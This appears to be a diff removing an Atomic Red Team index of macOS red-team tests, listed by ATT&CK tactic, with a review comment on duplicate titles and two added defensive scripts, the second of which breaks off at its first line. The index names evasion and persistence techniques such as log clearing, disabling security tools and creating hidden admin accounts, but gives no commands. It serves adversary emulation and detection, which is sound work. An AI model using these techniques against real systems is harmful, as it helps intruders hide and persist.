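Review bot: the two T1048 entries in this hunk, "Atomic Test #1: Exfiltration Over Alternative Protocol - SSH" and "Atomic Test #2: Exfiltration Over Alternative Protocol - SSH", carry identical titles, so the index gives a reader no way to tell the two tests apart; check whether the underlying test names were meant to differ (for example by tool or transport) before this listing is relied on. Two smaller title defects in the same hunk: "arguement" in the T1059.006 entry "Execute shell script via python's command mode arguement" should read "argument", and the T1543.002 entry "Create Systemd Service file, Enable the service , Modify and Reload the service." has a stray space before the second comma.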
@@ -1,746 +0,0 @@
# macOS Atomic Tests by ATT&CK Tactic & Technique
# defense-evasion
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1143 Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [macos, linux]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [macos, linux]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [macos, linux]
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- Atomic Test #10: Chmod through c script [macos, linux]
- Atomic Test #11: Chown through c script [macos, linux]
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- T1116 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
- [T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- Atomic Test #2: Delete log files using built-in log utility [macos]
- Atomic Test #3: Truncate system log files via truncate utility [macos]
- Atomic Test #4: Delete log files via cat utility by appending /dev/null or /dev/zero [macos]
- Atomic Test #5: System log file deletion via find utility [macos]
- Atomic Test #6: Overwrite macOS system log via echo utility [macos]
- Atomic Test #7: Real-time system log clearance/deletion [macos]
- Atomic Test #8: Delete system log files via unlink utility [macos]
- Atomic Test #9: Delete system log files using shred utility [macos]
- Atomic Test #10: Delete system log files using srm utility [macos]
- Atomic Test #11: Delete system log files using OSAScript [macos]
- Atomic Test #12: Delete system log files using Applescript [macos]
- T1089 Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.008 Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.001 Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md)
- Atomic Test #1: Gatekeeper Bypass [macos]
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
- Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #3: Base64 decoding with Python [linux, macos]
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
- Atomic Test #6: Hex decoding with shell utilities [linux, macos]
- Atomic Test #7: Linux Base64 Encoded Shebang in CLI [linux, macos]
- Atomic Test #8: XOR decoding and command execution using Python [linux, macos]
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.008 Indicator Removal on Host: Clear Mailbox Data](../../T1070.008/T1070.008.md)
- Atomic Test #3: Copy and Delete Mailbox Data on macOS [macos]
- Atomic Test #6: Copy and Modify Mailbox Data on macOS [macos]
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.004 Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [macos, linux]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #3: Enable Guest Account on macOS [macos]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1144 Gatekeeper Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1045 Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.006 Impair Defenses: Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.004 Masquerading: Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1647 Plist File Modification](../../T1647/T1647.md)
- Atomic Test #1: Plist Modification [macos]
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.002 Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md)
- Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
- Atomic Test #2: Create Hidden User using IsHidden option [macos]
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1149 LC_MAIN Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #5: Disable Carbon Black Response [macos]
- Atomic Test #6: Disable LittleSnitch [macos]
- Atomic Test #7: Disable OpenDNS Umbrella [macos]
- Atomic Test #8: Disable macOS Gatekeeper [macos]
- Atomic Test #9: Stop and unload Crowdstrike Falcon on macOS [macos]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.009 Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.003 Masquerading: Rename System Utilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #3: Install root CA on macOS [macos]
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #3: C compile [linux, macos]
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1147 Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1146 Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
- Atomic Test #3: Binary simply packed by UPX [macos]
- Atomic Test #4: Binary packed by UPX, with modified headers [macos]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
- Atomic Test #1: Space After Filename (Manual) [macos]
- Atomic Test #2: Space After Filename [macos, linux]
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
- Atomic Test #5: Hidden files [macos]
- Atomic Test #6: Hide a Directory [macos]
- Atomic Test #7: Show all hidden files [macos]
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
- Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
- Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
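The two T1564.002 tests above (UniqueID below 500, and the IsHidden attribute) leave artifacts that are easy to audit once you know what `dscl` prints. The script below is an added example for this index, not an Atomic Red Team test: it parses the `name uid` / `name flag` lines produced by `dscl . -list /Users UniqueID` and `dscl . -list /Users IsHidden`, and flags accounts that sit below UID 500 without following Apple's underscore naming convention for built-in service accounts, or that carry a non-zero IsHidden value. The sample data embedded in the block is constructed (the account names `svc_backup` and `helper` are invented) so the logic runs on any host; on a real Mac the `audit_live_system` function feeds the live directory through the same filters.

```shell
#!/bin/sh
# Added example (not an Atomic Red Team test): audit macOS local accounts for the
# two hiding tricks exercised by the T1564.002 tests in this index.
#   1. UniqueID below 500 (macOS hides such accounts from the login window)
#   2. the IsHidden attribute set to 1
# Both filters read stdin in the format produced by
#   dscl . -list /Users UniqueID   ->  "<name> <uid>"   one account per line
#   dscl . -list /Users IsHidden   ->  "<name> <0|1>"   one account per line
# so they can be exercised with constructed data on a non-macOS host.

# Print account names with a numeric UID below 500 that do not follow Apple's
# convention for built-in service accounts (a leading underscore), excluding
# the classic Unix accounts root, daemon and nobody. Anything left is worth a look.
suspicious_low_uid_users() {
  awk '
    $2 ~ /^[0-9]+$/ && $2 < 500 &&
    $1 !~ /^_/ && $1 != "root" && $1 != "daemon" && $1 != "nobody" { print $1 }
  '
}

# Print account names whose IsHidden attribute is present and non-zero.
# dscl only lists accounts that actually carry the attribute.
hidden_flag_users() {
  awk '$2 ~ /^[0-9]+$/ && $2 != 0 { print $1 }'
}

# Run both filters against the live directory service. Only meaningful on macOS;
# elsewhere dscl is absent and the function returns 2 without auditing anything.
audit_live_system() {
  if ! command -v dscl >/dev/null 2>&1; then
    echo "dscl not found: not a macOS host, nothing audited" >&2
    return 2
  fi
  echo "== accounts with UniqueID < 500 outside Apple naming conventions =="
  dscl . -list /Users UniqueID | suspicious_low_uid_users
  echo "== accounts with IsHidden set =="
  dscl . -list /Users IsHidden 2>/dev/null | hidden_flag_users
}

# Constructed sample data (not captured from a real system) standing in for
# dscl output after both T1564.002 tests were run: "svc_backup" was created
# with UID 401 and "helper" was given IsHidden=1.
SAMPLE_UNIQUEID='_spotlight 89
_mbsetupuser 248
daemon 1
nobody -2
root 0
alice 501
svc_backup 401'

SAMPLE_ISHIDDEN='alice 0
helper 1
svc_backup 0'

main() {
  echo "sample low-UID hits: $(printf '%s\n' "$SAMPLE_UNIQUEID" | suspicious_low_uid_users | tr '\n' ' ')"
  echo "sample IsHidden hits: $(printf '%s\n' "$SAMPLE_ISHIDDEN" | hidden_flag_users | tr '\n' ' ')"
  audit_live_system || true
}

main "$@"
```

Run it as root on the test Mac after executing the T1564.002 atomics and again after cleanup; the hidden account should appear in the first run and vanish in the second. The underscore allow-list is a heuristic: an attacker can name a low-UID account `_update` to blend in, so treat the UID filter as a triage step, not proof of absence.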
# persistence
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1156 Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1161 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1163 Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1162 Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.004 Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #3: Enable Guest Account on macOS [macos]
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap EXIT [macos, linux]
- Atomic Test #2: Trap SIGINT [macos, linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #2: Create a user account on a MacOS system [macos]
- T1547.011 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1164 Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.014 Event Triggered Execution: Emond](../../T1546.014/T1546.014.md)
  - Atomic Test #1: Persistence with Event Monitor - emond [macos]
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #2: MacOS - Load Kernel Module via kextload and kmutil [macos]
- Atomic Test #3: MacOS - Load Kernel Module via KextManagerLoadKextWithURL() [macos]
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.005 Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.001 Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- Atomic Test #2: Event Monitor Daemon Persistence [macos]
- T1519 Emond [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- T1159 Launch Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.007 Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Copy in loginwindow.plist for Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications using LoginHook [macos]
- Atomic Test #3: Append to existing loginwindow for Re-Opened Applications [macos]
- T1160 Launch Daemon [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
- Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
- Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
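The persistence tests in this section all write to a small set of well-known macOS locations (LaunchAgents and LaunchDaemons plists, StartupItems, rc.common, emond rules, crontabs, shell profile files, SSH authorized_keys, loginwindow preferences). The script below is an added example for this index, not part of Atomic Red Team: it walks those locations and prints each file found together with the ATT&CK ID of the test in this list that writes there, so a run can be verified and cleaned up. The ID-to-path mapping is my annotation based on the test names above; the function takes a root directory and a home directory as parameters so it can be pointed at a mounted image, or at a constructed directory tree for testing, instead of the live system.

```shell
#!/bin/sh
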